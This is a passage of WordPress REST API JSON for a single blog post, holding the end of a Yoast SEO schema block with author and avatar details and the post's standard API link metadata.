redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/50207","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=50207"}],"version-history":[{"count":0,"href":"htt
ps:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/50207\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=50207"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=50207"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=50207"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}